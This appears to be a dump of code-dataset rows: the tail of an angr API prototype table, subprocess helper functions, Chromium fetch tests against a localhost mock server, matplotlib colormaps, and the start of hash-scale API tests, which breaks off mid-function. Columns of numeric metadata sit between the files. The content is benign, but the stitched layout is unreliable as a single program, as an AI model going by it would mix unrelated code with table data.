'EcRetrySubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "EventSourceName", "Flags"]),
#
'EcClose': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Object"]),
}
lib.set_prototypes(prototypes)
| 201.326923
| 1,470
| 0.740854
| 1,087
| 10,469
| 7.087397
| 0.110396
| 0.184839
| 0.101765
| 0.146028
| 0.82866
| 0.82866
| 0.826843
| 0.819574
| 0.814123
| 0.811267
| 0
| 0.024438
| 0.077562
| 10,469
| 51
| 1,471
| 205.27451
| 0.773325
| 0.002675
| 0
| 0
| 0
| 0
| 0.235854
| 0.055529
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.172414
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ad437a4bd92339f8ed6ec631d91c1435c5056312
| 1,677
|
py
|
Python
|
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
"""
Some utils function to run command.
"""
from subprocess import Popen, PIPE, CalledProcessError, call
import shlex
import sys
def _run_command_and_print_output(command):
command_list = shlex.split(command, posix="win" not in sys.platform)
with Popen(command_list, stdout=PIPE, stderr=PIPE) as process:
while True:
output_stdout = process.stdout.readline()
output_stderr = process.stderr.readline()
if (not output_stdout) and (not output_stderr) and (process.poll() is not None):
break
if output_stdout:
print(output_stdout.decode())
if output_stderr:
print(output_stderr.decode())
rc = process.poll()
return rc
def _run_command_and_print_output_split(command_list):
with Popen(command_list, stdout=PIPE, stderr=PIPE) as process:
while True:
output_stdout = process.stdout.readline()
output_stderr = process.stderr.readline()
if (not output_stdout) and (not output_stderr) and (process.poll() is not None):
break
if output_stdout:
print(output_stdout.decode())
if output_stderr:
print(output_stderr.decode())
rc = process.poll()
return rc
def _call_command(command):
command_list = shlex.split(command, posix="win" not in sys.platform)
try:
call(command_list)
except CalledProcessError as e:
raise Exception(e.output)
def _call_command_split(command_list):
try:
call(command_list)
except CalledProcessError as e:
raise Exception(e.output)
| 31.641509
| 92
| 0.636852
| 201
| 1,677
| 5.114428
| 0.233831
| 0.085603
| 0.025292
| 0.031128
| 0.847276
| 0.847276
| 0.797665
| 0.797665
| 0.797665
| 0.797665
| 0
| 0
| 0.278473
| 1,677
| 52
| 93
| 32.25
| 0.849587
| 0.020871
| 0
| 0.829268
| 0
| 0
| 0.003672
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.219512
| 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad8bae8d4649d4b2f018e1e2569e143bcd7f2599
| 15,655
|
py
|
Python
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 8
|
2018-06-04T09:34:28.000Z
|
2021-09-16T15:21:24.000Z
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 4
|
2018-03-03T07:45:27.000Z
|
2019-12-26T20:38:18.000Z
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 1
|
2019-12-26T20:36:32.000Z
|
2019-12-26T20:36:32.000Z
|
import unittest
import socket
import json
import base64
import zlib
import gzip
import bs4
import ChromeController
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import WebRequest
from . import testing_server
class TestChromium(unittest.TestCase):
def setUp(self):
self.wg = WebRequest.WebGetRobust()
# Configure mock server.
self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg, is_chromium=True)
def tearDown(self):
self.mock_server.shutdown()
# Hacky force-close of the chromium interface
# self.wg.close_chromium()
del self.wg
def test_fetch_1(self):
page = self.wg.getpage("http://localhost:{}".format(self.mock_server_port))
self.assertEqual(page, 'Root OK?')
def test_fetch_chromium_1(self):
page, fname, mtype = self.wg.getItemChromium("http://localhost:{}".format(self.mock_server_port))
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, 'Root OK?')
def test_fetch_chromium_2(self):
page, fname, mtype = self.wg.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
self.assertEqual(fname, 'raw-txt')
self.assertEqual(mtype, 'text/plain')
self.assertEqual(page, 'Root OK?')
def test_fetch_chromium_3(self):
page, fname, mtype = self.wg.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
self.assertEqual(fname, 'binary_ctnt')
self.assertEqual(mtype, 'image/jpeg')
self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
def test_fetch_chromium_4(self):
page, fname, mtype = self.wg.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_fetch_chromium_5(self):
page, fname, mtype = self.wg.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_head_chromium_1(self):
url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
purl_1 = self.wg.getHeadChromium(url_1)
self.assertEqual(purl_1, url_1)
def test_head_chromium_2(self):
url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
purl_2 = self.wg.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
self.assertEqual(purl_2, url_2)
def test_head_chromium_3(self):
url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
purl_3 = self.wg.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
self.assertEqual(purl_3, url_3)
def test_head_title_chromium_1(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_2(self):
pg_url = "http://localhost:{}/".format(self.mock_server_port)
retreived = self.wg.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_3(self):
pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
retreived = self.wg.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_4(self):
pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
retreived = self.wg.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': "localhost:{}/content/no-title".format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_5(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg.getHeadTitleChromium(pg_url, title_timeout=5)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
class TestChromiumPooled(unittest.TestCase):
def setUp(self):
self.wg_1 = WebRequest.WebGetRobust()
self.wg_2 = WebRequest.WebGetRobust()
# Configure mock server.
self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg_1, is_chromium=True)
def tearDown(self):
self.mock_server.shutdown()
# Hacky force-close of the chromium interface
self.wg_1.close_chromium()
self.wg_2.close_chromium()
del self.wg_1
del self.wg_2
def test_fetch_1(self):
page = self.wg_1.getpage("http://localhost:{}/".format(self.mock_server_port))
self.assertEqual(page, 'Root OK?')
def test_tab_repeatability_1(self):
tgturl = "http://localhost:{}/".format(self.mock_server_port)
page, fname, mtype = self.wg_1.getItemChromium(tgturl)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, 'Root OK?')
# print("Creating tab again!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
at_url = cr.get_current_url()
self.assertEqual(at_url, tgturl)
# print("3rd tab context!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
self.assertEqual(cur_url, tgturl)
def test_tab_flushing_1(self):
tgturl = "http://localhost:{}/".format(self.mock_server_port)
page, fname, mtype = self.wg_1.getItemChromium(tgturl)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, 'Root OK?')
for x in range(20):
# print("Creating tab again!")
with self.wg_1.chromiumContext(url=tgturl, extra_tid=x) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
# print("3rd tab context!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
self.assertNotEqual(cur_url, tgturl)
def test_fetch_chromium_2(self):
page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
self.assertEqual(fname, 'raw-txt')
self.assertEqual(mtype, 'text/plain')
self.assertEqual(page, 'Root OK?')
def test_fetch_chromium_3(self):
page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
self.assertEqual(fname, 'binary_ctnt')
self.assertEqual(mtype, 'image/jpeg')
self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
def test_fetch_chromium_4(self):
page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_fetch_chromium_5(self):
page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_head_chromium_1(self):
url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
purl_1 = self.wg_1.getHeadChromium(url_1)
self.assertEqual(purl_1, url_1)
def test_head_chromium_2(self):
url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
purl_2 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
self.assertEqual(purl_2, url_2)
def test_head_chromium_3(self):
url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
purl_3 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
self.assertEqual(purl_3, url_3)
def test_head_title_chromium_1(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_2(self):
pg_url = "http://localhost:{}/".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_3(self):
pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_4(self):
pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': "localhost:{}/content/no-title".format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_5(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url, title_timeout=5)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
class TestChromiumPooled(unittest.TestCase):
def setUp(self):
self.wg_1 = WebRequest.WebGetRobust(use_global_tab_pool=False)
self.wg_2 = WebRequest.WebGetRobust(use_global_tab_pool=False)
# Configure mock server.
self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg_1, is_chromium=True)
def tearDown(self):
self.mock_server.shutdown()
# Hacky force-close of the chromium interface
self.wg_1.close_chromium()
self.wg_2.close_chromium()
# self.wg.close_chromium()
del self.wg_1
del self.wg_2
def test_fetch_1(self):
page = self.wg_1.getpage("http://localhost:{}/".format(self.mock_server_port))
self.assertEqual(page, 'Root OK?')
def test_tab_repeatability_1(self):
tgturl = "http://localhost:{}/".format(self.mock_server_port)
page, fname, mtype = self.wg_1.getItemChromium(tgturl)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, 'Root OK?')
# print("Creating tab again!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
at_url = cr.get_current_url()
self.assertEqual(at_url, tgturl)
# print("3rd tab context!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
self.assertEqual(cur_url, tgturl)
def test_tab_flushing_1(self):
tgturl = "http://localhost:{}/".format(self.mock_server_port)
page, fname, mtype = self.wg_1.getItemChromium(tgturl)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, 'Root OK?')
for x in range(20):
# print("Creating tab again!")
with self.wg_1.chromiumContext(url=tgturl, extra_tid=x) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
# print("3rd tab context!")
with self.wg_1.chromiumContext(url=tgturl) as cr:
title, cur_url = cr.get_page_url_title()
# print("title, cur_url", title, cur_url)
self.assertNotEqual(cur_url, tgturl)
def test_fetch_chromium_2(self):
page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
self.assertEqual(fname, 'raw-txt')
self.assertEqual(mtype, 'text/plain')
self.assertEqual(page, 'Root OK?')
def test_fetch_chromium_3(self):
page, fname, mtype = self.wg_1.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
self.assertEqual(fname, 'binary_ctnt')
self.assertEqual(mtype, 'image/jpeg')
self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
def test_fetch_chromium_4(self):
page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_fetch_chromium_5(self):
page, fname, mtype = self.wg_1.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
self.assertEqual(fname, '')
self.assertEqual(mtype, 'text/html')
self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
def test_head_chromium_1(self):
url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
purl_1 = self.wg_1.getHeadChromium(url_1)
self.assertEqual(purl_1, url_1)
def test_head_chromium_2(self):
url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
purl_2 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
self.assertEqual(purl_2, url_2)
def test_head_chromium_3(self):
url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
purl_3 = self.wg_1.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
self.assertEqual(purl_3, url_3)
def test_head_title_chromium_1(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_2(self):
pg_url = "http://localhost:{}/".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_3(self):
pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
# If no title is specified, chromium returns the server URL
'url': pg_url,
'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_4(self):
pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url)
expect = {
'url': pg_url,
'title': "localhost:{}/content/no-title".format(self.mock_server_port),
}
self.assertEqual(retreived, expect)
def test_head_title_chromium_5(self):
pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
retreived = self.wg_1.getHeadTitleChromium(pg_url, title_timeout=5)
expect = {
'url': pg_url,
'title': 'I can haz title?',
}
self.assertEqual(retreived, expect)
| 35.660592
| 131
| 0.727435
| 2,248
| 15,655
| 4.840747
| 0.058719
| 0.113031
| 0.091344
| 0.102555
| 0.978588
| 0.977302
| 0.977302
| 0.965723
| 0.963242
| 0.958464
| 0
| 0.013911
| 0.122964
| 15,655
| 438
| 132
| 35.742009
| 0.77866
| 0.07908
| 0
| 0.855799
| 0
| 0
| 0.172924
| 0.027952
| 0
| 0
| 0
| 0
| 0.263323
| 1
| 0.15674
| false
| 0
| 0.037618
| 0
| 0.203762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad98687fa440eea01888668e1af0dd4880635fc9
| 8,329
|
py
|
Python
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 2
|
2019-05-23T07:11:04.000Z
|
2019-05-24T14:18:21.000Z
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 2
|
2018-04-11T12:36:31.000Z
|
2019-02-15T00:21:17.000Z
|
NeBSS/struct/colormaps.py
|
PIRCImagingTools/NeBSS
|
509b3fdbe08d53ea44da1db5f865ba8e3a534164
|
[
"BSD-3-Clause"
] | 3
|
2017-07-21T18:05:41.000Z
|
2019-01-23T09:32:10.000Z
|
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.colors import ListedColormap
def blue():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 1.0, 1.0))
}
return LinearSegmentedColormap('Blue', cdict)
def blue_r():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 1.0),
(1.0, 0.3, 1.0))
}
return LinearSegmentedColormap('Blue_r', cdict)
def darkgreen():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.2),
(1.0, 0.5, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green', cdict)
def darkgreen_r():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.5),
(1.0, 0.2, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green_r', cdict)
def green():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.3),
(1.0, 1.0, 1.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green', cdict)
def green_r():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 1.0),
(1.0, 0.3, 1.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green_r', cdict)
def lightblue():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.2),
(1.0, 0.9, 1.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0))
}
return LinearSegmentedColormap('Green', cdict)
def lightblue_r():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.9),
(1.0, 0.2, 1.0)),
'blue': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0))
}
return LinearSegmentedColormap('Green_r', cdict)
def orange():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0)),
'green': ((0.0, 0.0, 0.2),
(1.0, 0.5, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green', cdict)
def orange_r():
cdict = {'red': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0)),
'green': ((0.0, 0.0, 0.5),
(1.0, 0.2, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Green_r', cdict)
def purple():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 1.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0))
}
return LinearSegmentedColormap('Green', cdict)
def purple_r():
cdict = {'red': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0))
}
return LinearSegmentedColormap('Green_r', cdict)
def red():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 1.0, 1.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Red', cdict)
def red_r():
cdict = {'red': ((0.0, 0.0, 1.0),
(1.0, 0.3, 1.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('Red_r', cdict)
def yellow():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0)),
'green': ((0.0, 0.0, 0.3),
(1.0, 1.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('yellow_green', cdict)
def yellow_r():
cdict = {'red': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0)),
'green': ((0.0, 0.0, 1.0),
(1.0, 0.3, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('yellow_green_r', cdict)
def yellow_green():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.9, 0.0)),
'green': ((0.0, 0.0, 0.4),
(1.0, 0.8, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('yellow_green', cdict)
def yellow_green_r():
cdict = {'red': ((0.0, 0.0, 0.9),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.8),
(1.0, 0.4, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('yellow_green_r', cdict)
################################################
### SEGMENTATION COLORS
################################################
def brainstem():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0))
}
return LinearSegmentedColormap('brainstem', cdict)
def cerebellum():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0))
}
return LinearSegmentedColormap('cerebellum', cdict)
def cortex():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('cortex', cdict)
def csf():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'green': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('csf', cdict)
def dgm():
cdict = {'red': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0))
}
return LinearSegmentedColormap('csf', cdict)
def wm():
cdict = {'red': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'green': ((0.0, 0.0, 0.0),
(1.0, 0.0, 0.0)),
'blue': ((0.0, 0.0, 0.3),
(1.0, 0.9, 0.0))
}
return LinearSegmentedColormap('wm', cdict)
##########################
def custom_discrete(name, colors):
return ListedColormap(colors, name)
if __name__ =='__main__':
from matplotlib import pyplot, mpl
fig = pyplot.figure(figsize=(8,3))
ax1 = fig.add_axes([0.05,0.8,0.9,0.15])
cb1 = mpl.colorbar.ColorbarBase(ax1, cmap=green_r(),
orientation='horizontal')
pyplot.show()
| 27.949664
| 61
| 0.339176
| 1,187
| 8,329
| 2.350463
| 0.046335
| 0.371326
| 0.38172
| 0.34552
| 0.803584
| 0.779211
| 0.779211
| 0.778853
| 0.778853
| 0.768459
| 0
| 0.184897
| 0.429223
| 8,329
| 297
| 62
| 28.043771
| 0.401977
| 0.002281
| 0
| 0.656388
| 0
| 0
| 0.057307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.110132
| false
| 0
| 0.013216
| 0.004405
| 0.23348
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ad9d999cd314bd0f8f5ebaed93a9f9ed58284e3e
| 2,949
|
py
|
Python
|
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | null | null | null |
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | null | null | null |
t.scales/test_hashes.py
|
countercept/snake-charmer
|
c37da399c6123549f1880c4487038a2281a487e1
|
[
"BSD-3-Clause"
] | 1
|
2018-09-04T09:41:29.000Z
|
2018-09-04T09:41:29.000Z
|
import json
import requests
def test_hashes_scale(regtest, db, url):
r = requests.get(url + '/scale/hashes')
m = r.json()['data']['scale']
regtest.write(str(json.dumps(m, sort_keys=True)))
def test_hashes_md5_file(regtest, db, url, file):
data = {
"sha256_digest": file['sha256_digest'],
"scale": "hashes",
"command": "md5_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
cmd['data']['command']['end_time'] = None
regtest.write(str(json.dumps(cmd, sort_keys=True)))
def test_hashes_sha1_file(regtest, db, url, file):
data = {
"sha256_digest": file['sha256_digest'],
"scale": "hashes",
"command": "sha1_digest"
}
r = requests.post(url + '/command', json=data)
cmd = r.json()
cmd['data']['command']['timestamp'] = None
cmd['data']['command']['start_time'] = None
